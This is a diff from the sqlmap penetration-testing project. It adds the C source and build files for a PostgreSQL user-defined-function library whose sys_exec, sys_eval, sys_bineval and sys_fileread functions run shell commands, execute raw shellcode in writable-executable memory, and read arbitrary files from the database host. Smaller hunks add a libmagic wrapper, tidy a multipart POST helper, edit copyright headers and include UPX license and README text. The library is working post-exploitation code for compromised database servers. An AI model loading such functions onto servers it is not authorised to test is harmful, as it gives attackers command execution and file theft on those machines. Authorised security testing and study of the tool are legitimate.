+</VisualStudioProject>
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c
@@ -0,0 +1,274 @@
+/* 
+	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com/
+	email: bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define _USE_32BIT_TIME_T
+#define DLLEXP __declspec(dllexport) 
+#define BUILDING_DLL 1
+#else
+#define DLLEXP
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#include <postgres.h>
+#include <fmgr.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	int32 result = 0;
+	char *command;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command execution: %s", command);
+	*/
+
+	result = system(command);
+	free(command);
+
+	PG_FREE_IF_COPY(argv0, 0);
+	PG_RETURN_INT32(result);
+}
+
+PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	char *command;
+	char *result;
+	FILE *pipe;
+	char line[1024];
+	int32 outlen, linelen;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command evaluated: %s", command);
+	*/
+
+	result = (char *)malloc(1);
+	outlen = 0;
+
+	pipe = popen(command, "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = (char *)realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (*result) {
+		result[outlen-1] = 0x00;
+	}
+
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+
+	PG_RETURN_POINTER(result_text);
+}
+
+PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, VARDATA(argv0), len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		PG_RETURN_INT32(1);
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			PG_RETURN_INT32(1);
+
+		strncpy((char *)addr, VARDATA(argv0), len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	PG_RETURN_INT32(0);
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj
@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_postgresqludf_sys"
+	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
+	RootNamespace="lib_postgresqludf_sys"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="false"
+				SubSystem="0"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_postgresqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
--- a/lib/init.py
+++ b/lib/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/contrib/init.py
+++ b/lib/contrib/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/contrib/magic.py
+++ b/lib/contrib/magic.py
@@ -0,0 +1,194 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Adam Hupp <adam@hupp.org>
+
+Reference: http://hupp.org/adam/hg/python-magic
+
+License: PSF (http://www.python.org/psf/license/)
+"""
+
+import os.path
+import ctypes
+import ctypes.util
+
+from ctypes import c_char_p, c_int, c_size_t, c_void_p
+
+class MagicException(Exception): pass
+
+class Magic:
+    """
+    Magic is a wrapper around the libmagic C library.  
+    
+    """
+
+    def __init__(self, mime=False, magic_file=None):
+        """
+        Create a new libmagic wrapper.
+
+        mime - if True, mimetypes are returned instead of textual descriptions
+        magic_file - use a mime database other than the system default
+        
+        """
+        flags = MAGIC_NONE
+        if mime:
+            flags |= MAGIC_MIME
+            
+        self.cookie = magic_open(flags)
+
+        magic_load(self.cookie, magic_file)
+
+    def from_buffer(self, buf):
+        """
+        Identify the contents of `buf`
+        """
+        return magic_buffer(self.cookie, buf)
+
+    def from_file(self, filename):
+        """
+        Identify the contents of file `filename`
+        raises IOError if the file does not exist
+        """
+
+        if not os.path.exists(filename):
+            raise IOError("File does not exist: " + filename)
+        
+        return magic_file(self.cookie, filename)
+
+    def __del__(self):
+        try:
+            magic_close(self.cookie)
+        except Exception, _:
+            pass
+
+_magic_mime = None
+_magic = None
+
+def _get_magic_mime():
+    global _magic_mime
+    if not _magic_mime:
+        _magic_mime = Magic(mime=True)
+    return _magic_mime
+
+def _get_magic():
+    global _magic
+    if not _magic:
+        _magic = Magic()
+    return _magic
+
+def _get_magic_type(mime):
+    if mime:
+        return _get_magic_mime()
+    else:
+        return _get_magic()
+
+def from_file(filename, mime=False):
+    m = _get_magic_type(mime)
+    return m.from_file(filename)
+
+def from_buffer(buffer, mime=False):
+    m = _get_magic_type(mime)
+    return m.from_buffer(buffer)
+
+try:
+    libmagic = ctypes.CDLL(ctypes.util.find_library('magic'))
+
+    magic_t = ctypes.c_void_p
+
+    def errorcheck(result, func, args):
+        err = magic_error(args[0])
+        if err is not None:
+            raise MagicException(err)
+        else:
+            return result
+
+    magic_open = libmagic.magic_open
+    magic_open.restype = magic_t
+    magic_open.argtypes = [c_int]
+
+    magic_close = libmagic.magic_close
+    magic_close.restype = None
+    magic_close.argtypes = [magic_t]
+    magic_close.errcheck = errorcheck
+
+    magic_error = libmagic.magic_error
+    magic_error.restype = c_char_p
+    magic_error.argtypes = [magic_t]
+
+    magic_errno = libmagic.magic_errno
+    magic_errno.restype = c_int
+    magic_errno.argtypes = [magic_t]
+
+    magic_file = libmagic.magic_file
+    magic_file.restype = c_char_p
+    magic_file.argtypes = [magic_t, c_char_p]
+    magic_file.errcheck = errorcheck
+
+    _magic_buffer = libmagic.magic_buffer
+    _magic_buffer.restype = c_char_p
+    _magic_buffer.argtypes = [magic_t, c_void_p, c_size_t]
+    _magic_buffer.errcheck = errorcheck
+
+    def magic_buffer(cookie, buf):
+        return _magic_buffer(cookie, buf, len(buf))
+
+    magic_load = libmagic.magic_load
+    magic_load.restype = c_int
+    magic_load.argtypes = [magic_t, c_char_p]
+    magic_load.errcheck = errorcheck
+
+    magic_setflags = libmagic.magic_setflags
+    magic_setflags.restype = c_int
+    magic_setflags.argtypes = [magic_t, c_int]
+
+    magic_check = libmagic.magic_check
+    magic_check.restype = c_int
+    magic_check.argtypes = [magic_t, c_char_p]
+
+    magic_compile = libmagic.magic_compile
+    magic_compile.restype = c_int
+    magic_compile.argtypes = [magic_t, c_char_p]
+except:
+    pass
+
+MAGIC_NONE = 0x000000 # No flags
+
+MAGIC_DEBUG = 0x000001 # Turn on debugging
+
+MAGIC_SYMLINK = 0x000002 # Follow symlinks
+
+MAGIC_COMPRESS = 0x000004 # Check inside compressed files
+
+MAGIC_DEVICES = 0x000008 # Look at the contents of devices
+
+MAGIC_MIME = 0x000010 # Return a mime string
+
+MAGIC_CONTINUE = 0x000020 # Return all matches
+
+MAGIC_CHECK = 0x000040 # Print warnings to stderr
+
+MAGIC_PRESERVE_ATIME = 0x000080 # Restore access time on exit
+
+MAGIC_RAW = 0x000100 # Don't translate unprintable chars
+
+MAGIC_ERROR = 0x000200 # Handle ENOENT etc as real errors
+
+MAGIC_NO_CHECK_COMPRESS = 0x001000 # Don't check for compressed files
+
+MAGIC_NO_CHECK_TAR = 0x002000 # Don't check for tar files
+
+MAGIC_NO_CHECK_SOFT = 0x004000 # Don't check magic entries
+
+MAGIC_NO_CHECK_APPTYPE = 0x008000 # Don't check application type
+
+MAGIC_NO_CHECK_ELF = 0x010000 # Don't check for elf details
+
+MAGIC_NO_CHECK_ASCII = 0x020000 # Don't check for ascii files
+
+MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff
+
+MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran
+
+MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens
--- a/lib/contrib/multipartpost.py
+++ b/lib/contrib/multipartpost.py
@@ -5,6 +5,8 @@ $Id$

 02/2006 Will Holcomb <wholcomb@gmail.com>

+Reference: http://odin.himinbi.org/MultipartPostHandler.py
+
 This library is free software; you can redistribute it and/or
 modify it under the terms of the GNU Lesser General Public
 License as published by the Free Software Foundation; either
@@ -14,10 +16,12 @@ This library is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import mimetools
 import mimetypes
 import os
@@ -33,7 +37,6 @@ class Callable:
    def __init__(self, anycallable):
        self.__call__ = anycallable

-
 # Controls how sequences are uncoded. If true, elements may be given
 # multiple values by assigning a sequence.
 doseq = 1
@@ -44,12 +47,14 @@ class MultipartPostHandler(urllib2.BaseHandler):

    def http_request(self, request):
        data = request.get_data()
+        
        if data is not None and type(data) != str:
            v_files = []
            v_vars = []
+            
            try:
                for(key, value) in data.items():
-                     if type(value) == file:
+                    if type(value) == file or hasattr(value, 'file'):
                        v_files.append((key, value))
                    else:
                        v_vars.append((key, value))
@@ -69,16 +74,18 @@ class MultipartPostHandler(urllib2.BaseHandler):
            request.add_data(data)
        return request

-
    def multipart_encode(vars, files, boundary = None, buffer = None):
        if boundary is None:
            boundary = mimetools.choose_boundary()
+
        if buffer is None:
            buffer = ''
+
        for(key, value) in vars:
            buffer += '--%s\r\n' % boundary
            buffer += 'Content-Disposition: form-data; name="%s"' % key
            buffer += '\r\n\r\n' + value + '\r\n'
+
        for(key, fd) in files:
            file_size = os.fstat(fd.fileno())[stat.ST_SIZE]
            filename = fd.name.split('/')[-1]
@@ -89,9 +96,11 @@ class MultipartPostHandler(urllib2.BaseHandler):
            # buffer += 'Content-Length: %s\r\n' % file_size
            fd.seek(0)
            buffer += '\r\n' + fd.read() + '\r\n'
+
        buffer += '--%s--\r\n\r\n' % boundary
+
        return boundary, buffer
+
    multipart_encode = Callable(multipart_encode)

    https_request = http_request
-
--- a/lib/contrib/upx/doc/LICENSE
+++ b/lib/contrib/upx/doc/LICENSE
@@ -0,0 +1,138 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+
+
+                 ooooo     ooo ooooooooo.   ooooooo  ooooo
+                 `888'     `8' `888   `Y88.  `8888    d8'
+                  888       8   888   .d88'    Y888..8P
+                  888       8   888ooo88P'      `8888'
+                  888       8   888            .8PY888.
+                  `88.    .8'   888           d8'  `888b
+                    `YbodP'    o888o        o888o  o88888o
+
+
+                    The Ultimate Packer for eXecutables
+          Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar
+               http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
+                          http://www.nexus.hu/upx
+                            http://upx.tsx.org
+
+
+PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN
+TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION.
+
+
+ABSTRACT
+========
+
+   UPX and UCL are copyrighted software distributed under the terms
+   of the GNU General Public License (hereinafter the "GPL").
+
+   The stub which is imbedded in each UPX compressed program is part
+   of UPX and UCL, and contains code that is under our copyright. The
+   terms of the GNU General Public License still apply as compressing
+   a program is a special form of linking with our stub.
+
+   As a special exception we grant the free usage of UPX for all
+   executables, including commercial programs.
+   See below for details and restrictions.
+
+
+COPYRIGHT
+=========
+
+   UPX and UCL are copyrighted software. All rights remain with the authors.
+
+   UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
+   UPX is Copyright (C) 1996-2000 Laszlo Molnar
+
+   UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
+
+
+GNU GENERAL PUBLIC LICENSE
+==========================
+
+   UPX and the UCL library are free software; you can redistribute them
+   and/or modify them under the terms of the GNU General Public License as
+   published by the Free Software Foundation; either version 2 of
+   the License, or (at your option) any later version.
+
+   UPX and UCL are distributed in the hope that they will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program; see the file COPYING.
+
+
+SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES
+============================================
+
+   The stub which is imbedded in each UPX compressed program is part
+   of UPX and UCL, and contains code that is under our copyright. The
+   terms of the GNU General Public License still apply as compressing
+   a program is a special form of linking with our stub.
+
+   Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special
+   permission to freely use and distribute all UPX compressed programs
+   (including commercial ones), subject to the following restrictions:
+
+   1. You must compress your program with a completely unmodified UPX
+      version; either with our precompiled version, or (at your option)
+      with a self compiled version of the unmodified UPX sources as
+      distributed by us.
+   2. This also implies that the UPX stub must be completely unmodfied, i.e.
+      the stub imbedded in your compressed program must be byte-identical
+      to the stub that is produced by the official unmodified UPX version.
+   3. The decompressor and any other code from the stub must exclusively get
+      used by the unmodified UPX stub for decompressing your program at
+      program startup. No portion of the stub may get read, copied,
+      called or otherwise get used or accessed by your program.
+
+
+ANNOTATIONS
+===========
+
+  - You can use a modified UPX version or modified UPX stub only for
+    programs that are compatible with the GNU General Public License.
+
+  - We grant you special permission to freely use and distribute all UPX
+    compressed programs. But any modification of the UPX stub (such as,
+    but not limited to, removing our copyright string or making your
+    program non-decompressible) will immediately revoke your right to
+    use and distribute a UPX compressed program.
+
+  - UPX is not a software protection tool; by requiring that you use
+    the unmodified UPX version for your proprietary programs we
+    make sure that any user can decompress your program. This protects
+    both you and your users as nobody can hide malicious code -
+    any program that cannot be decompressed is highly suspicious
+    by definition.
+
+  - You can integrate all or part of UPX and UCL into projects that
+    are compatible with the GNU GPL, but obviously you cannot grant
+    any special exceptions beyond the GPL for our code in your project.
+
+  - We want to actively support manufacturers of virus scanners and
+    similar security software. Please contact us if you would like to
+    incorporate parts of UPX or UCL into such a product.
+
+
+
+Markus F.X.J. Oberhumer                   Laszlo Molnar
+markus.oberhumer@jk.uni-linz.ac.at        ml1050@cdata.tvnet.hu
+
+Linz, Austria, 25 Feb 2000
+
+
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.3ia
+Charset: noconv
+
+iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI
+wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf
+dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx
+OO03+ojZdO8=
+=CS52
+-----END PGP SIGNATURE-----
--- a/lib/contrib/upx/doc/README
+++ b/lib/contrib/upx/doc/README
@@ -0,0 +1,142 @@
+                 ooooo     ooo ooooooooo.   ooooooo  ooooo
+                 `888'     `8' `888   `Y88.  `8888    d8'
+                  888       8   888   .d88'    Y888..8P
+                  888       8   888ooo88P'      `8888'
+                  888       8   888            .8PY888.
+                  `88.    .8'   888           d8'  `888b
+                    `YbodP'    o888o        o888o  o88888o
+
+
+                    The Ultimate Packer for eXecutables
+   Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar & John Reiser
+                        http://upx.sourceforge.net
+
+
+
+WELCOME
+=======
+
+Welcome to UPX !
+
+Please don't forget to read the file LICENSE - UPX is distributed
+under the GNU General Public License (GPL) with special exceptions
+allowing the distribution of all compressed executables, including
+commercial programs.
+
+
+INTRODUCTION
+============
+
+UPX is an advanced executable file compressor. UPX will typically
+reduce the file size of programs and DLLs by around 50%-70%, thus
+reducing disk space, network load times, download times and
+other distribution and storage costs.
+
+Programs and libraries compressed by UPX are completely self-contained
+and run exactly as before, with no runtime or memory penalty for most
+of the supported formats.
+
+UPX supports a number of different executable formats, including
+Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs,
+and Linux executables and kernels.
+
+UPX is free software distributed under the term of the GNU General
+Public License. Full source code is available.
+
+UPX may be distributed and used freely, even with commercial applications.
+See the UPX License Agreement for details.
+
+UPX is rated number one in the well known Archive Comparison Test. Visit
+http://compression.ca/ .
+
+UPX aims to be Commercial Quality Freeware.
+
+
+SHORT DOCUMENTATION
+===================
+
+'upx program.exe' will compress a program or DLL. For best compression
+results try 'upx --brute program.exe'.
+
+Please see the file UPX.DOC for the full documentation. The files
+NEWS and BUGS also contain various tidbits of information.
+
+
+DISCLAIMER
+==========
+
+UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.
+
+Having said that, we think that UPX is quite stable now. Indeed we
+have compressed lots of files without any problems. Also, the
+current version has undergone several months of beta testing -
+actually it's almost 8 years since our first public beta.
+
+This is the first production quality release, and we plan that future
+releases will be backward compatible with this version.
+
+Please report all problems or suggestions to the authors. Thanks.
+
+
+THE FUTURE
+==========
+
+  - We'd really love to support handheld systems like the PalmPilot because
+    compression makes a lot of sense here. And - because of the atari/tos
+    format - we already have a working decompressor in 68000 assembly.
